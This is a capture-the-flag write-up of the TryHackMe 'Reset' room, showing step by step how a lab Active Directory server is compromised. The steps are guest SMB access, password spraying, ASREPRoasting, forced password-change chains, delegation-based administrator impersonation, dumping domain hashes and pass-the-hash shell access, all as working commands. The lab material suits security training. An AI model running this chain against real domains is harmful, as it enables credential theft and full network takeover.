Reset Writeup

theblxckcicadatheblxckcicada
5 min read

Credit for this room goes to : h4sh3m00 and tryhackme

In this room, we'll step into the shoes of a red teamer in a simulated hack challenge. We'll navigate a realistic organizational environment with up-to-date defenses, where we'll test our penetration testing skills, try to bypass security measures, and infiltrate the system.

From our nmap scan, using the tool nmapAutomator, we can see that the machine is a Windows server running Active Directory. Below is a snippet of the nmap results that will be most important for us.

 sudo nmapAutomator.sh -t Full -H 10.10.149.103


PORT      STATE SERVICE       VERSION
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-19 07:41:43Z)
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: thm.corp0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: thm.corp0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: THM
|   NetBIOS_Domain_Name: THM
|   NetBIOS_Computer_Name: HAYSTACK
|   DNS_Domain_Name: thm.corp
|   DNS_Computer_Name: HayStack.thm.corp
|   DNS_Tree_Name: thm.corp
|   Product_Version: 10.0.17763
|_  System_Time: 2025-07-19T07:42:35+00:00
| ssl-cert: Subject: commonName=HayStack.thm.corp
| Not valid before: 2025-07-18T07:32:24
|_Not valid after:  2026-01-17T07:32:24
|_ssl-date: 2025-07-19T07:43:15+00:00; 0s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: HAYSTACK; OS: Windows; CPE: cpe:/o:microsoft:windows

From the nmap scan we can see that the domain for this server is thm.corp and the DNS Computer name is haystack.thm.corp. Both of these domains we add them in /etc/hosts

10.10.149.103       thm.corp haystack.thm.corp

By using crackmapexec we are able to list the shares with a guest user as it is not disabled and does not require a password. We can see from the results that we are able to read and write in Data share drive.

crackmapexec smb thm.corp -g 'guest' -p '' --shares

To access the share drive we use smbclient and pass the guest user account with no password. In the drive we find a directory named onboarding and within the directory we find 3 files and we use the smb commands to download all of them.

smbclient //thm.corp/Data -U guest

# Download the files from smbclient
prompt off # this disables confirmation when downloading
resurse on # this is to download even sub directory data if they exist 
mget * # this is to download everything in the current directory 
exit # to exit the smbclient shell session

Now that we have downloaded all the files to our local machine, we can see that the text file contains an email template. It appears to be intended for a new team member and includes a default password: ResetMe123!.

cat 4fx32pug.h2y.txt

Well we have a password but no user account, it’s time we find a user. As we noticed that the guest account is active we use impacket’s lookupsid to try and grab all the local and domain usernames in the server.

impacket-lookupsid thm.corp/guest@thm.corp -no-pass  |  awk -F '[:\\\\\\\\(\\\\)]' '/SidTypeUser/ {{print $3}}'

We save the list of users to the users.txt file for safe keeping as we may need it later. To find if a user didn’t update their password and still uses the default one we can use kerbrute or crackmapexec and in this case I used crackmapexec and found a valid user LILY_ONEILL.

crackmapexec smb thm.corp -u users.txt -p 'ResetMe123!'

Even though we found valid user credentials, we couldn't use them because they were revoked. So, we need to find another attack path. Just like we used impacket-lookupsid, we will use impacket-GetNPUsers, which tries to collect non-preauth AS_REP responses for a given list of users. This method is known as ASREPRoasting. From the list of hashes we obtained, we managed to crack the password for TABATHA_BRITT using hashcat, as shown below.

 impacket-GetNPUsers 'thm.corp/guest'@thm.corp -no-pass -request -usersfile users.txt


hashcat hash.txt /opt/wordlists/rockyou.txt

Now that we have a valid username and password we need an advantage which in this case is to use bloodhound to gather more information about our target.

bloodhound-python -d thm.corp -u tabatha_britt -p 'marlboro(1985)' -ns 10.10.149.103  -c all

To launch the Bloodhound web interface, use the following command. When you run sudo docker-compose -f bloodhound.yml up, you will receive a default password. The username will be admin, and you'll need to use the provided password initially, then reset it.

sudo apt update && sudo apt upgrade
sudo apt install docker.io
sudo systemctl enable docker --now
sudo apt install docker-compose
curl -L https://ghst.ly/getbhce -o bloodhound.yml
sudo docker-compose -f bloodhound.yml up

After logging into the interface, upload all the Bloodhound files and go to Explore. Instead of searching, click on PATHFINDING. From SEARCHING, we know that CECILE_WONG is part of the Domain Admins, so we need to find the path to her account.

The snippet above shows that TABATHA_BRITT can force a password change for SHAWNA_BRAY, who can do the same for CRUZ_HALL. CRUZ_HALL can then force a password change for DARLA_WINTERS, who has permissions to delegate on the server. We use the following steps to change the passwords of these users.

net rpc password "SHAWNA_BRAY" "P@ssw0rd123" -U "thm.corp"/"TABATHA_BRITT"%"marlboro(1985)" -S "10.10.149.103"  
net rpc password "CRUZ_HALL" "P@ssw0rd123" -U "thm.corp"/"SHAWNA_BRAY"%"P@ssw0rd123" -S "10.10.149.103" 
net rpc password "DARLA_WINTERS" "P@ssw0rd123" -U "thm.corp"/"CRUZ_HALL"%"P@ssw0rd123" -S "10.10.149.103"

Now that we have DARLA_WINTERS' valid credentials we use impacket-findDelegation to list the delegation rights.

impacket-findDelegation thm.corp/'DARLA_WINTERS':P@ssw0rd123  -dc-ip 10.10.149.103

From the list we choose the cifs/HayStack.thm.corp to impersonate an administrator and request a ticket on behalf of the administrator then save that ticket to KRB5CCNAME environment variable.

# Request ticket onbehalf of the administrator 
impacket-getST thm.corp/'DARLA_WINTERS':'P@ssw0rd123' -spn cifs/HAYSTACK.thm.corp -impersonate administrator -dc-ip 10.10.149.103

# Save to environment variable
export KRB5CCNAME=administrator@cifs_HAYSTACK.thm.corp@THM.CORP.ccache

Now that we have the ticket we can pass the ticket and dump the domain controller NTLM hashes for all the users.

impacket-secretsdump thm.corp/administrator@HAYSTACK.thm.corp -k -no-pass -dc-ip 10.10.149.103 -just-dc-ntlm

Final step is to use evil-winrm to get shell session with CECILE_WONG's NTLM hash who is part of the domain admin users.

evil-winrm -u CECILE_WONG -H 067a84e5afaed843ed4a8fdac5facac3 -i thm.corp

As you followed along, you'll notice that I didn't show any flags, and that was intentional. This write-up is meant to help you understand and develop the mindset of a penetration tester. We are not hunting for flags; instead, we are simulating real-world attacks. Keep practicing, stay curious, and let each challenge sharpen your approach to real-world security testing.

1
Subscribe to my newsletter

Read articles from theblxckcicada directly inside your inbox. Subscribe to the newsletter, and don't miss out.

tryhackmeCTFCTF WriteuppentestingSecurityethicalhackinghacking

Written by

theblxckcicada
theblxckcicada